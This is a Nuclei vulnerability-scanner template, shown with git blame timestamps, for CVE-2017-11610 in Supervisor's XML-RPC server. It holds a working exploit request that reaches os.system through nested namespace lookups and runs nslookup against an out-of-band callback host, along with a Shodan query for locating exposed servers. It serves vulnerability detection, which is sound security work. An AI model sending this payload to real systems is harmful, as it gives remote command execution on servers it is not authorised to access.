nuclei-templates/cves/2017/CVE-2017-11610.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2021-11-15 23:27:25 +00:00
id: CVE-2017-11610
info:
2021-11-21 09:57:06 +00:00
name: Supervisor XMLRPC Exec
2021-11-15 23:27:25 +00:00
author: notnotnotveg
severity: high
2021-11-17 13:06:30 +00:00
description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.
2021-11-15 23:27:25 +00:00
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
metadata:
shodan-query: 'http.title:"Supervisor Status"'
2021-11-17 13:06:30 +00:00
tags: cve,cve2017,rce,supervisor,oast
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-11610
cwe-id: CWE-276
2021-11-17 13:06:30 +00:00
2021-11-15 23:27:25 +00:00
requests:
2021-11-17 13:19:32 +00:00
- raw:
2021-11-15 23:27:25 +00:00
- |
POST /RPC2 HTTP/1.1
Host: {{Hostname}}
Accept: text/xml
Content-type: text/xml
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>nslookup {{interactsh-url}}</string>
2021-11-15 23:27:25 +00:00
</param>
</params>
</methodCall>
matchers:
- type: word
2021-11-17 13:06:30 +00:00
part: interactsh_protocol
2021-11-15 23:27:25 +00:00
words:
- "dns"